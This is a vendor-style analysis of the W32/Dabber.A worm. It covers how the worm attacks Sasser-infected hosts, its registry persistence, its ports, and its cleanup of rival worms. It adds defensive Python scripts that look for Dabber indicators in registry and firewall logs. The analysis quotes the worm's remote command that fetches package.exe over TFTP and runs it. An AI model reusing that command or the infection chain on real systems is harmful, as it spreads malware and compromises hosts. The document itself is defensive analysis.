W32/Dabber.A!worm
Analysis
Specifics
This 32-bit virus has a packed file size of 29,696 bytes.
This virus attacks systems already infected with the
Sasser virus. The Dabber virus exploits a vulnerability
in the FTP server component of Sasser. The exploit is
based on code that overwrites a structured exception
handler (SEH) pointer. This virus also runs a TFTP server
in order to serve itself to target systems.
Load At Windows Startup
If this virus is run, it will copy itself to the Windows
folder as "package.exe". The virus will have
a related Mutex named "sas4dab" - if this
Mutex already exists, the virus assumes it has infected
the system and will not run. The virus will register
itself to load at each Windows startup -
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
sassfix = %Windows%\package.exe
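The persistence artifact described above (a Run value named "sassfix" pointing at package.exe in the Windows folder) and the hard-coded All Users Startup drop path from the write-up can be checked from captured host data. The following is an added example, not code from the original page or from Fortinet: it parses the text format that the Windows `reg query` command prints and flags matching entries, and it checks a list of file paths against the two drop locations. The `reg query` output and the file-path list are constructed samples; the function and constant names are this example's own.

```python
import re

# Constructed sample of `reg query HKLM\...\Run` output from a suspect host
# (not taken from the original page; the "sassfix" line is the Dabber artifact).
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    sassfix    REG_SZ    C:\WINDOWS\package.exe
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
"""

# Constructed list of file paths, as a scanner might enumerate them.
SAMPLE_PATHS = [
    r"C:\WINDOWS\package.exe",
    r"C:\WINDOWS\system32\notepad.exe",
    r"C:\Documents and Settings\All Users\Start Menu\Programs\Startup\package.exe",
    r"C:\Documents and Settings\alice\Desktop\package.txt",
]

# Indicators stated in the write-up.
DABBER_VALUE_NAME = "sassfix"
DABBER_FILE_NAME = "package.exe"
DABBER_STARTUP_PATH = (
    r"c:\documents and settings\all users\start menu\programs\startup\package.exe"
)

# One value line of `reg query` output: name, type and data separated by runs of spaces.
VALUE_LINE = re.compile(r"^\s+(?P<name>\S.*?)\s{2,}(?P<type>REG_\w+)\s{2,}(?P<data>.*)$")


def parse_reg_query(text):
    """Parse `reg query` output into (key, value_name, value_type, data) tuples."""
    entries = []
    current_key = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line.startswith(" "):
            # Unindented lines are key paths; indented lines are values under them.
            current_key = line.strip()
            continue
        m = VALUE_LINE.match(line)
        if m and current_key:
            entries.append((current_key, m["name"], m["type"], m["data"].strip()))
    return entries


def find_dabber_run_entries(text):
    """Return Run entries matching Dabber's persistence artifact.

    A hit is either the value name "sassfix" or any value whose data refers to
    package.exe, so a renamed value that still launches the dropped file is caught.
    """
    hits = []
    for key, name, typ, data in parse_reg_query(text):
        by_name = name.lower() == DABBER_VALUE_NAME
        by_file = DABBER_FILE_NAME in data.lower()
        if by_name or by_file:
            hits.append((key, name, typ, data))
    return hits


def find_dabber_drop_paths(paths, windows_dir=r"C:\WINDOWS"):
    """Flag paths equal to the two drop locations named in the write-up."""
    windows_drop = (windows_dir + "\\" + DABBER_FILE_NAME).lower()
    return [p for p in paths if p.lower() in (windows_drop, DABBER_STARTUP_PATH)]


if __name__ == "__main__":
    for hit in find_dabber_run_entries(SAMPLE_REG_QUERY):
        print("suspicious Run value:", hit)
    for path in find_dabber_drop_paths(SAMPLE_PATHS):
        print("suspicious file path:", path)
```

On a live host the `reg query` text would come from running the command and feeding its output to `find_dabber_run_entries`; the `windows_dir` parameter exists because the real Windows folder varies by installation.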
Search For Sasser
The virus will begin scanning random IP addresses on
destination TCP port 5554. Systems which respond are
then targets for Dabber - Dabber will send an SEH pointer
exploit to the target in order to gain access. Once
the target is compromised, Dabber initiates a remote
shell on TCP port 8967. Dabber then sends instructions
to the target to request a copy of Dabber from the source
system using tftp in this format -
tftp -i (source IP) GET hello.all package.exe
package.exe
exit
The above instructions execute "package.exe"
after receiving it. Dabber also attempts to copy itself
to the target system into this hard-coded path -
c:\Documents and Settings\All Users\Start Menu\Programs\Startup\package.exe
Remote Access Port
Dabber will bind with TCP port 9898 only as a listening
port. When a source system infects a target system,
it will send a connection attempt to TCP port 9898 as
a method to confirm and verify that the target is infected.
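The infection sequence described in the two sections above has a distinctive network shape: a probe to TCP 5554, a shell on TCP 8967, a TFTP transfer on UDP 69 flowing from the victim back to the source, and a verification connect to TCP 9898. The following is an added example, not code from the original page or from Fortinet, that correlates those stages per (source, target) pair over firewall log lines and also reports hosts sweeping many addresses on port 5554. The log format ("time src dst proto dport action") and the log lines are constructed for the example; the stage names and thresholds are this example's own choices.

```python
from collections import defaultdict

# Ports from the write-up: Sasser FTP server (5554/tcp), Dabber remote shell
# (8967/tcp), TFTP retrieval of package.exe (69/udp), infection check (9898/tcp).
STAGE_BY_PORT = {
    ("tcp", 5554): "probe_sasser_ftp",
    ("tcp", 8967): "remote_shell",
    ("udp", 69): "tftp_fetch",
    ("tcp", 9898): "verify_infection",
}

# Constructed firewall log lines (not from the original page), one event per line:
# "<time> <src_ip> <dst_ip> <proto> <dst_port> <action>"
SAMPLE_LOG = """\
10:00:01 10.0.0.5 10.0.1.20 tcp 5554 allow
10:00:01 10.0.0.5 10.0.1.21 tcp 5554 deny
10:00:02 10.0.0.5 10.0.1.22 tcp 5554 deny
10:00:03 10.0.0.5 10.0.1.20 tcp 8967 allow
10:00:04 10.0.1.20 10.0.0.5 udp 69 allow
10:00:06 10.0.0.5 10.0.1.20 tcp 9898 allow
10:01:00 10.0.2.9 10.0.1.30 tcp 80 allow
10:01:05 10.0.2.9 10.0.1.30 tcp 5554 deny
"""


def parse_log(text):
    """Parse the constructed log format into event dicts; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 6:
            continue
        ts, src, dst, proto, dport, action = parts
        events.append({"ts": ts, "src": src, "dst": dst, "proto": proto.lower(),
                       "dport": int(dport), "action": action.lower()})
    return events


def correlate_dabber(events, min_stages=2, scan_threshold=3):
    """Return infection chains per (source, target) pair and port-5554 scanners.

    A chain is reported when at least `min_stages` distinct stages were allowed
    between the same pair. A scanner is a host that probed at least
    `scan_threshold` distinct targets on 5554/tcp, allowed or denied.
    """
    stages = defaultdict(set)        # (source, target) -> stage names seen
    scan_targets = defaultdict(set)  # source -> hosts it probed on 5554
    for e in events:
        stage = STAGE_BY_PORT.get((e["proto"], e["dport"]))
        if stage is None:
            continue
        if stage == "tftp_fetch":
            # The target pulls package.exe from the source, so the pair is reversed.
            pair = (e["dst"], e["src"])
        else:
            pair = (e["src"], e["dst"])
        if stage == "probe_sasser_ftp":
            scan_targets[e["src"]].add(e["dst"])
        if e["action"] == "allow":
            stages[pair].add(stage)
    chains = {pair: sorted(seen) for pair, seen in stages.items()
              if len(seen) >= min_stages}
    scanners = {host: len(targets) for host, targets in scan_targets.items()
                if len(targets) >= scan_threshold}
    return {"chains": chains, "scanners": scanners}


if __name__ == "__main__":
    result = correlate_dabber(parse_log(SAMPLE_LOG))
    for pair, seen in result["chains"].items():
        print("possible Dabber infection %s -> %s: %s" % (pair[0], pair[1], ", ".join(seen)))
    for host, count in result["scanners"].items():
        print("port 5554 sweep from %s: %d targets" % (host, count))
```

The reversed direction of the TFTP stage matters: a rule that only keys on the original source address would miss the one event in the chain where the victim initiates the connection.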
Other Virus Cleanup Routine
Dabber will remove references to other viruses by deleting
known registry keys associated with those viruses. Dabber
removes these key values -
Window
Video Process
TempCom
SkynetRevenge
MapiDrv
BagleAV
System Updater Service
soundcontrl
WinMsrv32
drvddll.exe
navapsrc.exe
skynetave.exe
Generic Host Service
Windows Drive Compatibility
windows
Microsoft Update
Drvddll.exe
Drvddll_exe
drvsys
drvsys.exe
ssgrate
ssgrate.exe
lsasss
lsasss.exe
avserve2.exe
avvserrve32
avserve
Video
Taskmon
Gremlin
from these registry hive locations -
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Additionally Dabber deletes this registry key -
HKEY_CLASSES_ROOT\CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\InProcServer32
(Default)
Recommended Action
- Check the main screen using the web interface for
your FortiGate unit to ensure that the latest AV/NIDS
database has been downloaded and installed on your
system - if required, enable the "Allow Push
Update" option
- Using the FortiGate manager, block external to
internal traffic using UDP port 69 and TCP ports 5554,
8967 and 9898
- For Windows XP users, implement use of Personal
Firewall - this feature automatically blocks unsolicited
inbound traffic and would protect against this Internet
worm
- Ensure affected systems are updated with the latest
Microsoft security patches, and specifically the update
which addresses this vulnerability in MS04-011
Telemetry
Detection Availability
[Detection availability table: FortiGate, Extended, FortiClient, FortiMail, FortiSandbox, FortiWeb, Web Application Firewall, FortiIsolator, FortiDeceptor, FortiEDR; per-product values not preserved in this extraction]